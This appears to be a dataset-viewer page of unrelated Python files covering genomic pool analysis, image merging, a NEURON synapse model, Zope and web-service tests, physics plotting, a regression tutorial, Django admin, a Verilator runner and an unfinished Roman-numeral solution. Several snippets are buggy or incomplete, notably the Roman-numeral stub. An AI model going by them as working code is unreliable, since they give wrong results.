# Step 7: Functions for analyzing the pool presence table
# ------------------------------------------------------------------------------------------------ #
####################################################################################################
# ------------------------------------------------------------------------------------------------ #
def CalculateLibraryAddressLocatabilityForPoolPresenceTableLine(poolPresenceTableLine, \
rowPools, colPools, prPools, pcPools, controlPools, fitDict, areaDict, threshold, \
maxEntriesInSingleAddressPoolAxis, maxTotalCoords):
import pdb
[addresses_r, addresses_c, addresses_pr, addresses_pc, addresses_control] = \
CalculatePoolCoordsForLine(\
poolPresenceTableLine, rowPools, colPools, prPools, pcPools, controlPools, \
threshold=threshold)
[nRowCoords, nColCoords, nPRCoords, nPCCoords] = \
CalculateNumberOfEntriesInPoolAxes(addresses_r, addresses_c, \
addresses_pr, addresses_pc)
nTotalCoords = nRowCoords + nColCoords + nPRCoords + nPCCoords
[nAddressPoolAxesWithEntries, nControlPoolsWithEntries] = \
CalculateNumberOfPoolAxesThatHaveEntries(addresses_r, addresses_c, addresses_pr, \
addresses_pc, addresses_control)
nAddressPoolAxesWithMoreThanOneEntry = \
CalculateNumberOfPoolAxesThatHaveMoreThanOneEntry(addresses_r, addresses_c, \
addresses_pr, addresses_pc, addresses_control)
maxSinglePoolCoordNumber = \
CalculateMaxNumberOfEntriesInSinglePoolAxis(addresses_r, addresses_c, \
addresses_pr, addresses_pc)
# Decide on the locatability of the genomic coordinate
if nAddressPoolAxesWithEntries < 3:
locatability = 'unlocatable'
possibleAddressesAndScores = None
elif maxSinglePoolCoordNumber > maxEntriesInSingleAddressPoolAxis or \
nTotalCoords > maxTotalCoords:
locatability = 'unlocatable'
possibleAddressesAndScores = None
elif nAddressPoolAxesWithEntries == 3:
if nAddressPoolAxesWithMoreThanOneEntry > 1:
locatability = 'unlocatable'
possibleAddressesAndScores = None
elif nAddressPoolAxesWithMoreThanOneEntry <= 1:
locatability = 'guessable'
possibleAddressesAndScores = None
elif nAddressPoolAxesWithEntries == 4:
possibleAddressesAndScores = \
CalculateLibraryAddressesForPoolPresenceTableLine2(poolPresenceTableLine, \
rowPools, colPools, prPools, pcPools, fitDict, \
areaDict, threshold)
if len(possibleAddressesAndScores) == 0:
pdb.set_trace()
if nAddressPoolAxesWithMoreThanOneEntry > 1:
locatability = 'ambiguous'
elif nAddressPoolAxesWithMoreThanOneEntry <= 1:
locatability = 'unambiguous'
else:
locatability = 'unlocatable'
possibleAddressesAndScores = None
return [possibleAddressesAndScores, locatability, maxSinglePoolCoordNumber]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def PopulateSudokuGrid3(sudokuGridLookupDict, poolPresenceTable, rowPools, colPools, \
prPools, pcPools, controlPools, fitDict, areaDict, readCountThreshold, scoreThreshold, \
maxEntriesInSingleAddressPoolAxis, maxTotalCoords):
import pdb
i = 0
while i < len(poolPresenceTable):
poolPresenceTableLine = poolPresenceTable[i]
# pdb.set_trace()
coord = poolPresenceTableLine['readAlignmentCoord']
[possibleAddressesAndScores, locatability, maxSinglePoolCoordNumber] = \
CalculateLibraryAddressLocatabilityForPoolPresenceTableLine(poolPresenceTableLine, \
rowPools, colPools, prPools, pcPools, controlPools, fitDict, areaDict, readCountThreshold, \
maxEntriesInSingleAddressPoolAxis, maxTotalCoords)
# if (coord==5038710) or (coord==5038711) or (coord==5038712):
# pdb.set_trace()
if locatability == 'unambiguous':
AssignUnambiguousAddresses(sudokuGridLookupDict, possibleAddressesAndScores, coord, \
locatability)
elif locatability == 'ambiguous':
AssignAmbiguousAddresses(sudokuGridLookupDict, possibleAddressesAndScores, coord, \
locatability, maxSinglePoolCoordNumber)
elif locatability == 'guessable':
AssignGuessableAddresses(sudokuGridLookupDict, coord, poolPresenceTableLine, \
rowPools, colPools, prPools, pcPools, controlPools, fitDict, areaDict, \
readCountThreshold, maxEntriesInSingleAddressPoolAxis, maxTotalCoords)
i += 1
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def AddAddressToSudokuGrid(coord, locatability, possibleAddressesAndScoresEntry, \
sudokuGridLookupDict):
addressCoords = possibleAddressesAndScoresEntry[0].split('_')
locatabilityScore = possibleAddressesAndScoresEntry[2]
readCount = possibleAddressesAndScoresEntry[3]
row = addressCoords[0]
col = addressCoords[1]
pr = addressCoords[2]
pc = addressCoords[3]
sudokuCoord = SudokuGenomicCoord(coord, locatability, locatabilityScore, readCount)
sudokuGridLookupDict[pr][pc].wellGrid[row][col].readAlignmentCoords.append(sudokuCoord)
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def AssignUnambiguousAddresses(sudokuGridLookupDict, possibleAddressesAndScores, coord, \
locatability):
j = 0
while j < len(possibleAddressesAndScores):
AddAddressToSudokuGrid(coord, locatability, possibleAddressesAndScores[j], \
sudokuGridLookupDict)
j += 1
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def AssignAmbiguousAddresses(sudokuGridLookupDict, possibleAddressesAndScores, coord, \
locatability, maxEntriesInSingleAddressPoolAxis):
import operator
import pdb
sortedPossibleAddressesAndScores = sorted(possibleAddressesAndScores, \
key=operator.itemgetter(2), reverse=True)
# if coord==5038711:
# pdb.set_trace()
j = 0
continueAddingAddressesToSudokuGrid = True
while continueAddingAddressesToSudokuGrid == True:
try:
addressAndScore = sortedPossibleAddressesAndScores[j]
except IndexError:
pdb.set_trace()
AddAddressToSudokuGrid(coord, locatability, addressAndScore, sudokuGridLookupDict)
j += 1
if (j < maxEntriesInSingleAddressPoolAxis) \
and j < len(sortedPossibleAddressesAndScores):
continueAddingAddressesToSudokuGrid = True
else:
continueAddingAddressesToSudokuGrid = False
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def AssignGuessableAddresses(sudokuGridLookupDict, coord, poolPresenceTableLine, \
rowPools, colPools, prPools, pcPools, controlPools, fitDict, areaDict, readCountThreshold, \
maxSinglePoolCoordNumber, maxTotalCoords):
temporaryThreshold = 1
validAddressesFound = False
while validAddressesFound == False and temporaryThreshold <= readCountThreshold:
[possibleAddressesAndScores, locatability, maxSinglePoolCoordNumber] = \
CalculateLibraryAddressLocatabilityForPoolPresenceTableLine(poolPresenceTableLine, \
rowPools, colPools, prPools, pcPools, controlPools, fitDict, areaDict, temporaryThreshold, \
maxSinglePoolCoordNumber, maxTotalCoords)
if locatability == 'unambiguous':
validAddressesFound = True
else:
temporaryThreshold += 1
if validAddressesFound == True:
AssignUnambiguousAddresses(sudokuGridLookupDict, possibleAddressesAndScores, coord, \
'unambiguous')
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def SolvePoolPresenceTable(sudokuGridLookupDict, poolPresenceTable, \
rowPools, colPools, prPools, pcPools, controlPools, logReadNumberRatioHistogramFitDict, \
logReadNumberRatioHistogramIntegralDict, \
readCountThreshold, voigtScoreThreshold, maxSinglePoolCoordNumber, maxTotalCoords, \
maxGapForCoordGrouping):
import pdb
# pdb.set_trace()
PopulateSudokuGrid3(sudokuGridLookupDict, poolPresenceTable, rowPools, colPools, \
prPools, pcPools, controlPools, logReadNumberRatioHistogramFitDict, \
logReadNumberRatioHistogramIntegralDict, readCountThreshold, voigtScoreThreshold, \
maxSinglePoolCoordNumber, maxTotalCoords)
sudokuGridTaxonomyDictPreGrouping = CalculateSudokuGridOccupancyTaxonomy(sudokuGridLookupDict, \
rowPools, colPools, prPools, pcPools)
GroupReadAlignmentCoordsInSudokuGrid(sudokuGridLookupDict, prPools, pcPools, rowPools, \
colPools, maxGap=maxGapForCoordGrouping)
sudokuGridTaxonomyDict = CalculateSudokuGridOccupancyTaxonomy(sudokuGridLookupDict, rowPools, \
colPools, prPools, pcPools)
print('Sudoku Taxonomy Pre-Grouping')
PrintSudokuGridOccupancyTaxonomy(sudokuGridTaxonomyDictPreGrouping)
print('Sudoku Taxonomy Post-Grouping')
PrintSudokuGridOccupancyTaxonomy(sudokuGridTaxonomyDict)
return sudokuGridTaxonomyDict
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GroupSudokuGenomicCoords(coordArray, maxGap=1):
import pdb
import numpy
import operator
i = 0
expect = None
run = []
result = [run]
currentLineMatchesPrevious = True
while i < len(coordArray):
if currentLineMatchesPrevious:
run.append(coordArray[i])
else:
run = [coordArray[i]]
result.append(run)
currentLineMatchesPrevious = False
if i < len(coordArray) - 1:
currentCoord = coordArray[i].coord
nextCoord = coordArray[i+1].coord
expect = currentCoord + maxGap
if nextCoord <= expect:
currentLineMatchesPrevious = True
i += 1
groupedCoords = []
i = 0
while i < len(result):
if len(result[i]) == 1:
# pdb.set_trace()
groupedCoords.append(result[i][0])
elif len(result[i]) > 1:
coords = sorted(result[i], key=operator.attrgetter('readCount'), reverse=True)
j = 0
readCountList = []
while j < len(coords):
k = 0
while k < coords[j].readCount:
readCountList.append(coords[j].coord)
k += 1
j += 1
representativeCoord = numpy.median(readCountList)
j = 0
totalReadCount = 0
locatabilityArray = []
while j < len(coords):
totalReadCount += coords[j].readCount
locatabilityArray.append(coords[j].locatability)
j +=1
if 'unambiguous' in locatabilityArray:
locatability = 'unambiguous'
elif 'ambiguous' in locatabilityArray:
locatability = 'ambiguous'
elif 'guessable' in locatabilityArray:
locatability = 'guessable'
else:
locatability = 'merged'
locatabilityScore = 'merged'
groupedCoords.append(SudokuGenomicCoord(representativeCoord, locatability, \
locatabilityScore, totalReadCount))
i += 1
return groupedCoords
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GroupReadAlignmentCoordsInSudokuGrid(sudokuGridLookupDict, prPools, pcPools, rowPools, \
colPools, maxGap=4):
import operator
for prPool in prPools:
for pcPool in pcPools:
sudokuPlate = None
try:
sudokuPlate = sudokuGridLookupDict[prPool][pcPool]
except IndexError:
print('No plate at: ' + rowPool + '_' + colPool)
pass
if sudokuPlate != None:
plateName = sudokuPlate.plateName
for colPool in colPools:
for rowPool in rowPools:
sudokuWell = sudokuPlate.wellGrid[rowPool][colPool]
readAlignmentCoords = sudokuWell.readAlignmentCoords
readAlignmentCoords = sorted(readAlignmentCoords, \
key=operator.attrgetter('coord'))
groupedReadAlignmentCoords = GroupSudokuGenomicCoords(readAlignmentCoords, \
maxGap=maxGap)
sudokuWell.readAlignmentCoords = groupedReadAlignmentCoords
# ------------------------------------------------------------------------------------------------ #
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import cv2
import numpy as np
import os
def join_images(images):
rows = len(images[0])
cols = len(images[0][0])
final_image = np.zeros((rows, cols, 1), np.uint8)
print(len(images))
for img in images:
for row in range(0, len(final_image)):
for col in range(0, len(final_image[0])):
final_image[row][col] += img[row][col]
return final_image
def main():
path = os.getcwd() + "\\Test"
dirs = [f for f in os.listdir(path) if not f.endswith('bmpfinal.bmp')]
print(dirs)
for d in dirs:
files = [f for f in os.listdir(path+ "\\" + d) if f.endswith('_.bmp')]
images = []
for f in files:
print(path + "\\" + d + "\\" + f)
mat = cv2.imread(path + "\\" + d + "\\" + f, cv2.IMREAD_GRAYSCALE)
images.append(mat)
for i in range(0, 8):
decoded_image = join_images(images[i:8])
cv2.imwrite(path + "\\" + d + "\\" + "rec{}.bmp".format(i), decoded_image)
main()
|
python
|
_mod_txt = """
NEURON {
POINT_PROCESS ExpSynMorphforge
RANGE tau, e, i
NONSPECIFIC_CURRENT i
RANGE peak_conductance
}
UNITS {
(nA) = (nanoamp)
(mV) = (millivolt)
(uS) = (microsiemens)
}
PARAMETER {
tau = 0.1 (ms) <1e-9,1e9>
e = 0 (mV)
peak_conductance = -100000 ()
}
ASSIGNED {
v (mV)
i (nA)
}
STATE {
g (uS)
}
INITIAL {
g=0
}
BREAKPOINT {
SOLVE state METHOD cnexp
i = g*(v - e)
}
DERIVATIVE state {
g' = -g/tau
}
UNITSOFF
NET_RECEIVE(weight (uS)) {
weight = 1.0
g = g + weight * peak_conductance
}
UNITSON
"""
def getExpSynModfile():
return _mod_txt
|
python
|
##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Remote Task test setup
"""
__docformat__ = "reStructuredText"
from Testing import ZopeTestCase
from zope.testing.doctest import INTERPRET_FOOTNOTES
from zope.testing.loggingsupport import InstalledHandler
import doctest
import random
import unittest
import logging
from five.taskqueue import service
ZopeTestCase.installProduct('Five')
def _configure_conflict_error_log_level():
import App.config
config = App.config.getConfiguration()
config.conflict_error_log_level = logging.INFO
App.config.setConfiguration(config)
def setUp(test):
test.globs['root'] = ZopeTestCase.base.app()
# As task will be run in different threads, we cannot rely on print
# results. We need to log calls to prove correctness.
log_info = InstalledHandler('z3c.taskqueue')
test.globs['log_info'] = log_info
# We pass the ZPublisher conflict logger to prove that no conflict
# happened.
conflict_logger = InstalledHandler('ZPublisher.Conflict')
test.globs['conflict_logger'] = conflict_logger
# Make sure ZPublisher conflict error log level is setup.
_configure_conflict_error_log_level()
test.origArgs = service.TaskService.processorArguments
service.TaskService.processorArguments = {'waitTime': 0.0}
# Make tests predictable
random.seed(27)
def tearDown(test):
random.seed()
service.TaskService.processorArguments = test.origArgs
class TestIdGenerator(unittest.TestCase):
def setUp(self):
random.seed(27)
self.service = service.TaskService()
def tearDown(self):
random.seed()
def test_sequence(self):
id = 1392637175
self.assertEquals(id, self.service._generateId())
self.assertEquals(id + 1, self.service._generateId())
self.assertEquals(id + 2, self.service._generateId())
self.assertEquals(id + 3, self.service._generateId())
def test_in_use_randomises(self):
id = 1392637175
self.assertEquals(id, self.service._generateId())
self.service.jobs[id + 1] = object()
id = 1506179619
self.assertEquals(id, self.service._generateId())
self.assertEquals(id + 1, self.service._generateId())
self.service.jobs[id + 1] = object()
self.assertEquals(id + 2, self.service._generateId())
def test_suite():
return unittest.TestSuite((
unittest.makeSuite(TestIdGenerator),
ZopeTestCase.ZopeDocFileSuite('processor.txt',
package='five.taskqueue.tests',
setUp=setUp,
tearDown=tearDown,
optionflags=doctest.NORMALIZE_WHITESPACE
| doctest.ELLIPSIS
| INTERPRET_FOOTNOTES),
))
|
python
|
# Copyright 2018 Braxton Mckee
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import requests
import time
import unittest
from bs4 import BeautifulSoup
from object_database.service_manager.ServiceManager import ServiceManager
from object_database.web.ActiveWebService import (
active_webservice_schema,
ActiveWebService,
User
)
from object_database import core_schema, connect, service_schema
from object_database.util import configureLogging, genToken
from object_database.test_util import autoconfigure_and_start_service_manager, currentMemUsageMb
ownDir = os.path.dirname(os.path.abspath(__file__))
ownName = os.path.basename(os.path.abspath(__file__))
DATABASE_SERVER_PORT=8023
WEB_SERVER_PORT=8025
class ActiveWebServiceTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.cleanupFn = lambda error=None: None
cls.base_url = "http://localhost:{port}".format(port=WEB_SERVER_PORT)
configureLogging("aws_test")
cls._logger = logging.getLogger(__name__)
def configurableSetUp(self, auth_type="LDAP",
auth_hostname=None, authorized_groups=(),
ldap_base_dn=None, ldap_ntlm_domain=None,
company_name=None):
self.token = genToken()
log_level = self._logger.getEffectiveLevel()
loglevel_name = logging.getLevelName(log_level)
self.server, self.cleanupFn = autoconfigure_and_start_service_manager(
port=DATABASE_SERVER_PORT,
auth_token=self.token,
loglevel_name=loglevel_name)
try:
self.database = connect("localhost", DATABASE_SERVER_PORT, self.token, retry=True)
self.database.subscribeToSchema(core_schema, service_schema, active_webservice_schema)
with self.database.transaction():
service = ServiceManager.createOrUpdateService(ActiveWebService, "ActiveWebService", target_count=0)
optional_args = []
if len(authorized_groups) > 0:
optional_args.extend(['--authorized-groups', *authorized_groups])
if auth_hostname:
optional_args.extend(['--auth-hostname', auth_hostname])
if ldap_base_dn:
optional_args.extend(['--ldap-base-dn', ldap_base_dn])
if ldap_ntlm_domain:
optional_args.extend(['--ldap-ntlm-domain', ldap_ntlm_domain])
if company_name:
optional_args.extend(['--company-name', company_name])
ActiveWebService.configureFromCommandline(
self.database,
service,
[
'--port', str(WEB_SERVER_PORT),
'--host', 'localhost',
'--log-level', loglevel_name,
'--auth', auth_type
] + optional_args
)
with self.database.transaction():
ServiceManager.startService("ActiveWebService", 1)
self.waitUntilUp()
except Exception:
self.cleanupFn(error=True)
raise
def waitUntilUp(self, timeout = 2.0):
t0 = time.time()
while time.time() - t0 < timeout:
try:
res = requests.get(self.base_url + "/login")
return
except Exception:
time.sleep(.5)
raise Exception("Webservice never came up.")
def tearDown(self):
self.cleanupFn()
def login(self, client, username='anonymous', password='bogus'):
# Because of CSRF security we need to do the following to authenticate:
# - Load the login page
# - Extract the csrf token (using BeautifulSoup)
# - Issue a POST request to the login endpoint that includes the CSRF token
login_url = self.base_url + "/login"
res = client.get(login_url)
self.assertFalse(res.history)
self.assertEqual(res.status_code, 200)
soup = BeautifulSoup(res.text, 'html.parser')
csrf_token = soup.find('input', dict(name='csrf_token'))['value']
res = client.post(login_url, data=dict(username=username, password=password, csrf_token=csrf_token))
self.assertTrue(res.history)
self.assertEqual(res.status_code, 200)
self.assertTrue('login' not in res.url)
def test_web_service_no_auth(self):
self.configurableSetUp(auth_type="NONE")
url = self.base_url + "/content/object_database.css"
client = requests.Session()
res = client.get(url)
self.assertTrue(res.history) # first time around we WILL get redirects
self.assertEqual(res.status_code, 200)
res = client.get(url)
self.assertFalse(res.history) # second time around we will NOT get redirects
self.assertEqual(res.status_code, 200)
self.assertEqual(res.url, url)
def test_web_service_login_and_access(self):
self.configurableSetUp(auth_type="PERMISSIVE")
url = self.base_url + "/content/object_database.css"
client = requests.Session()
username = 'anonymous'
# 1. Cannot access without login
res = requests.get(url)
self.assertTrue(res.history)
self.assertEqual(len(res.history), 1)
self.assertEqual(res.status_code, 200)
self.assertNotEqual(res.url, url)
self.assertTrue('login' in res.url)
# 2. login successfully
self.login(client, username)
# 3. now we can access our target page
res = client.get(url)
self.assertFalse(res.history)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.url, url)
# 4. test that we get auto-logged-out by modifying the user in object DB
with self.database.transaction():
user = User.lookupAny(username=username)
if user:
user.logout()
res = client.get(url)
self.assertTrue(res.history)
self.assertEqual(res.status_code, 200)
self.assertTrue('login' in res.url)
|
python
|
#!/usr/bin/env python
"""
read ntuple produced by Truth_JETMET...
make some validation plots
"""
import ROOT
ROOT.gROOT.SetBatch()
from optparse import OptionParser
def make_plots(file_name, post_fix):
import AtlasStyle
f1 = ROOT.TFile.Open(file_name)
tree = f1.Get("physics")
h_m4l = ROOT.TH1F("h_m4l", "m4l;m_{4l} [GeV];Events/2 GeV", 100, 100, 600)
h_mZ1 = ROOT.TH1F("h_mZ1", "mZ1;m_{Z1} [GeV];Events/1 GeV", 70, 30, 110)
h_mZ2 = ROOT.TH1F("h_mZ2", "mZ2;m_{Z2} [GeV];Events/2 GeV", 60, 0, 120)
h_Z1_lepplus_pt = ROOT.TH1F("h_Z1_lepplus_pt", "Z1_lepplus_pt;l^{+} of Z1 p_{T} [GeV];Events/4 GeV", 35, 0, 140)
h_Z2_lepplus_pt = ROOT.TH1F("h_Z2_lepplus_pt", "Z2_lepplus_pt;l^{+} of Z2 p_{T} [GeV];Events/4 GeV", 35, 0, 140)
h_Z1_lepminus_pt = ROOT.TH1F("h_Z1_lepminus_pt", "Z1_lepminus_pt;l^{-} of Z1 p_{T} [GeV];Events/ 4 GeV", 35, 0, 140)
h_Z2_lepminus_pt = ROOT.TH1F("h_Z2_lepminus_pt", "Z2_lepminus_pt;l^{-} of Z2 p_{T} [GeV];Events/ 4 GeV", 35, 0, 140)
tree.Draw("m4l/1E3>>"+h_m4l.GetName(), "")
tree.Draw("mZ1/1E3>>"+h_mZ1.GetName(), "")
tree.Draw("mZ2/1E3>>"+h_mZ2.GetName(), "")
tree.Draw("Z1_lepplus_pt/1E3>>"+h_Z1_lepplus_pt.GetName(), "")
tree.Draw("Z2_lepplus_pt/1E3>>"+h_Z2_lepplus_pt.GetName(), "")
tree.Draw("Z1_lepminus_pt/1E3>>"+h_Z1_lepminus_pt.GetName(), "")
tree.Draw("Z2_lepminus_pt/1E3>>"+h_Z2_lepminus_pt.GetName(), "")
canvas = ROOT.TCanvas("canvas", "canvas", 600, 600)
hists = [h_m4l, h_mZ1, h_mZ2, h_Z1_lepplus_pt, h_Z2_lepplus_pt, h_Z1_lepminus_pt, h_Z2_lepminus_pt]
for hist in hists:
hist.Draw()
canvas.SaveAs(post_fix+"_"+hist.GetName()+".pdf")
if __name__ == "__main__":
usage = "%prog file_name out_tag"
parser = OptionParser(usage=usage, description="read truth file, plot basic variables")
(options, args) = parser.parse_args()
if len(args) < 2:
print parser.print_help()
exit(1)
file_ = args[0]
out_ = args[1]
make_plots(file_, out_)
|
python
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import os
cd=os.path.join('LinearRegression','Kidem_ve_Maas_VeriSeti.csv')
dataset = pd.read_csv(cd)
print(dataset.describe())
x=dataset.iloc[:,:-1].values
y=dataset.iloc[:,1].values
from sklearn.cross_validation import train_test_split
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=1/3,random_state=0)
##Modeli Eğitme
from sklearn.linear_model import LinearRegression
regressor=LinearRegression()
regressor.fit(x_train,y_train)
y_pred=regressor.predict(x_test)
#visualize
plt.scatter(x_train,y_train,color='red')
plt.title('Kıdeme göre maaş tahmini regresyon modeli')
plt.xlabel('Kıdem')
plt.ylabel('Maaş')
plt.show()
plt.scatter(x_train,y_train,color='red')
modelin_tahmin_ettigi_y=regressor.predict(x_train)
plt.scatter(x_train,modelin_tahmin_ettigi_y,color='blue')
plt.title('Kıdeme göre maaş tahmini regresyon modeli')
plt.xlabel('Kıdem')
plt.ylabel('Maaş')
plt.show()
plt.scatter(x_train,y_train,color='red')
modelin_tahmin_ettigi_y=regressor.predict(x_train)
plt.plot(x_train,modelin_tahmin_ettigi_y,color='blue')
plt.title('Kıdeme göre maaş tahmini regresyon modeli')
plt.xlabel('Kıdem')
plt.ylabel('Maaş')
plt.show()
|
python
|
#__BEGIN_LICENSE__
# Copyright (c) 2015, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All rights reserved.
#
# The xGDS platform is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#__END_LICENSE__
from django.contrib import admin
from xgds_map_server import models
class KmlMapAdmin(admin.ModelAdmin):
list_display = ('uuid',
'name',
'parent',
'openable',
'visible',
'kmlFile',
'description')
list_editable = list_display[1:]
ordering = ('parent', 'name')
search_fields = ('name',
'description',
'kmlFile')
class MapLayerAdmin(admin.ModelAdmin):
list_display = ('uuid',
'name',
'parent',
'visible',
'description')
list_editable = list_display[1:]
ordering = ('parent', 'name')
search_fields = ('name',
'description')
class MapGroupAdmin(admin.ModelAdmin):
list_display = ('uuid',
'name',
'parent',
'description')
list_editable = list_display[1:]
ordering = ('parent', 'name')
search_fields = ('name',
'description')
class MapLayerAdmin(admin.ModelAdmin):
list_display = ('uuid',
'name',
'parent',
'visible',
'description')
list_editable = list_display[1:]
ordering = ('parent', 'name')
search_fields = ('name',
'description')
admin.site.register(models.KmlMap, KmlMapAdmin)
admin.site.register(models.MapGroup, MapGroupAdmin)
admin.site.register(models.MapLayer, MapLayerAdmin)
#TODO make admin classes for other map layer stuff below
admin.site.register(models.MapTile)
admin.site.register(models.WMSTile, MapLayerAdmin)
admin.site.register(models.WMTSTile, MapLayerAdmin)
admin.site.register(models.GroundOverlayTime, MapLayerAdmin)
admin.site.register(models.GeoJSON)
admin.site.register(models.Place)
admin.site.register(models.Geotiff)
|
python
|
__author__ = 'Jeremy'
|
python
|
#!/bin/false python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 The SymbiFlow Authors.
#
# Use of this source code is governed by a ISC-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/ISC
#
# SPDX-License-Identifier: ISC
import os
import shutil
from BaseRunner import BaseRunner
class Verilator(BaseRunner):
def __init__(self):
super().__init__("verilator", "verilator")
self.url = "https://verilator.org"
def prepare_run_cb(self, tmp_dir, params):
mode = params['mode']
conf = os.environ['CONF_DIR']
scr = os.path.join(tmp_dir, 'scr.sh')
shutil.copy(os.path.join(conf, 'runners', 'vmain.cpp'), tmp_dir)
build_dir = 'vbuild'
build_exe = 'vmain'
with open(scr, 'w') as f:
f.write('set -x\n')
f.write('{0} $@ || exit $?\n'.format(self.executable))
if mode == 'simulation':
f.write('make -C {} -f Vtop.mk\n'.format(build_dir))
f.write('./vbuild/{}'.format(build_exe))
# verilator executable is a script but it doesn't
# have shell shebang on the first line
self.cmd = ['sh', 'scr.sh']
if mode == 'simulation':
self.cmd += ['--cc']
elif mode == 'preprocessing':
self.cmd += ['-E']
else:
self.cmd += ['--lint-only']
self.cmd += ['-Wno-fatal', '-Wno-UNOPTFLAT', '-Wno-BLKANDNBLK']
# Flags for compliance testing:
self.cmd += ['-Wpedantic', '-Wno-context']
if params['top_module'] != '':
self.cmd.append('--top-module ' + params['top_module'])
if mode == 'preprocessing':
self.cmd += ['-P', '-E']
for incdir in params['incdirs']:
self.cmd.append('-I' + incdir)
if mode == 'simulation':
self.cmd += [
'--Mdir', build_dir, '--prefix', 'Vtop', '--exe', '-o',
build_exe
]
self.cmd.append('vmain.cpp')
if 'runner_verilator_flags' in params:
self.cmd += [params['runner_verilator_flags']]
for define in params['defines']:
self.cmd.append('-D' + define)
self.cmd += params['files']
|
python
|
class Solution:
def intToRoman(self, num):
def get_representation(num):
symbol_table={
1:"I",
5:"V",
10:"X",
50:"L",
100:"C",
500:"D",
1000 :"M",
}
if num < 4:
return symbol_table[1]*num
if 4 <= num <6 :
return symbol_table[1]+symbol_table[5] if num == 4 else symbol_table[5]
if 5< num < 9 :
return symbol_table[5]+symbol_table[1]
pass
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.